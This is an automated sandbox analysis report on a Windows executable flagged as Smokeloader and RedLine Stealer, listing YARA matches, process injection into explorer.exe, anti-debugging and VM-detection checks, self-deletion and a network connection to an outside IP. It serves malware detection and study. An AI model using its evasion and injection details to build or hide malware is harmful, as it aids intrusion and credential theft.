Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 2Qvkmk7HGr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tcgiwaf.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/2@72/1
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00403690 SetLastError,SetLastError,DefineDosDeviceA,_realloc,OpenJobObjectW,InterlockedExchangeAdd,_strlen,_abort,VirtualAlloc,GetTickCount,GetTickCount,GetDiskFreeSpaceExA,ReadConsoleInputA,InterlockedExchange,GetDiskFreeSpaceExA,LoadLibraryA,ReadConsoleInputA,LCMapStringA,OpenEventA,LCMapStringA,InterlockedExchange,OpenEventA,GetCurrentProcess,GetAltTabInfoW,GetCurrentProcess,GetAltTabInfoW,GetLastError,GetLastError,GetFileAttributesW,GetShortPathNameA,GlobalFree,GetFileAttributesW,GetShortPathNameA,GlobalFree,GetEnvironmentStrings,SetComputerNameW,InterlockedExchange,LoadLibraryA
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00531C87 CreateToolhelp32Snapshot,Module32First
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\tcgiwaf
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: LiEz (7_2_00403A10)
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: ZV7 (7_2_00403A10)
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: b6 (7_2_00403A10)
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: y9= (7_2_00403A10)
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: 5Myi (7_2_00403A10)
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Command line argument: Kn (7_2_00403A10)
Source: 2Qvkmk7HGr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2Qvkmk7HGr.exe | ReversingLabs: Detection: 39%
Source: 2Qvkmk7HGr.exe | Virustotal: Detection: 41%
Source: unknown | Process created: C:\Users\user\Desktop\2Qvkmk7HGr.exe "C:\Users\user\Desktop\2Qvkmk7HGr.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\tcgiwaf C:\Users\user\AppData\Roaming\tcgiwaf
Source: unknown | Process created: C:\Users\user\AppData\Roaming\tcgiwaf C:\Users\user\AppData\Roaming\tcgiwaf
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Unpacked PE file: 0.2.2Qvkmk7HGr.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Unpacked PE file: 5.2.tcgiwaf.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040AE2E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_0040294B push ebx; ret 0_2_00402957
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00402923 push ebx; ret 0_2_00402926
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00402930 push ebx; ret 0_2_00402942
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_0053920D push edi; iretd 0_2_00539228
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_005333C3 push es; ret 0_2_005333C4
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_005394E1 push edx; iretd 0_2_005395E2
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_005395B5 push edx; iretd 0_2_005395E2
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00552997 push ebx; ret 0_2_005529A9
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_0055298A push ebx; ret 0_2_0055298D
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_005529B2 push ebx; ret 0_2_005529BE
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_0040294B push ebx; ret 5_2_00402957
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00402923 push ebx; ret 5_2_00402926
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00402930 push ebx; ret 5_2_00402942
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00562997 push ebx; ret 5_2_005629A9
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_0056298A push ebx; ret 5_2_0056298D
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_005629B2 push ebx; ret 5_2_005629BE
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_0062920D push edi; iretd 5_2_00629228
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_006294E1 push edx; iretd 5_2_006295E2
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_006233C3 push es; ret 5_2_006233C4
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_006295B5 push edx; iretd 5_2_006295E2
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004078D5 push ecx; ret 7_2_004078E8
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00405483 push ecx; ret 7_2_00405496
Source: 2Qvkmk7HGr.exe | Static PE information: section name: .text entropy: 7.0024890042663355
Source: tcgiwaf.1.dr | Static PE information: section name: .text entropy: 7.0024890042663355
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\tcgiwaf
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\tcgiwaf

      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\2qvkmk7hgr.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\tcgiwaf:Zone.Identifier read attributes | delete

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\tcgiwaf | API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\tcgiwaf | API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 450
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2613
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1030
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 363
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 372
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1947
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 883
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 875
Source: C:\Windows\explorer.exe TID: 4136 | Thread sleep count: 450 > 30
Source: C:\Windows\explorer.exe TID: 648 | Thread sleep count: 2613 > 30
Source: C:\Windows\explorer.exe TID: 648 | Thread sleep time: -261300s >= -30000s
Source: C:\Windows\explorer.exe TID: 2588 | Thread sleep count: 1030 > 30
Source: C:\Windows\explorer.exe TID: 2588 | Thread sleep time: -103000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4924 | Thread sleep count: 363 > 30
Source: C:\Windows\explorer.exe TID: 4924 | Thread sleep time: -36300s >= -30000s
Source: C:\Windows\explorer.exe TID: 5756 | Thread sleep count: 335 > 30
Source: C:\Windows\explorer.exe TID: 8 | Thread sleep count: 372 > 30
Source: C:\Windows\explorer.exe TID: 8 | Thread sleep time: -37200s >= -30000s
Source: C:\Windows\explorer.exe TID: 648 | Thread sleep count: 1947 > 30
Source: C:\Windows\explorer.exe TID: 648 | Thread sleep time: -194700s >= -30000s
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW
Source: explorer.exe, 00000001.00000000.1753254303.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1753254303.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: explorer.exe, 00000001.00000000.1753254303.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752481052.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1753254303.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1749862002.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1752481052.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Process information queried: ProcessInformation

      Anti Debugging

Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\tcgiwaf | System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040540B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040AE2E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00531564 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_0055092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Code function: 0_2_00550D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_0056092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00560D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 5_2_00621564 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040540B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040456C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00408D38 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00405FB4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: tcgiwaf.1.dr
Source: C:\Windows\explorer.exe | Network Connect: 211.171.233.126 80
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Thread created: C:\Windows\explorer.exe EIP: 87D19D0
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Thread created: unknown EIP: 87F19D0
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\2Qvkmk7HGr.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1749490951.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_0040FAF0 GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00403560 GetNumberFormatW,CreateJobObjectA,GetTimeFormatW,GetNumberFormatW,CreateJobObjectA,GetConsoleAliasExesA,CreateNamedPipeW,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsGetValue,SetEnvironmentVariableW,GetTimeFormatW,GetModuleFileNameA
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_00409A64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\AppData\Roaming\tcgiwaf | Code function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW

      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

Source: Yara match, File source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
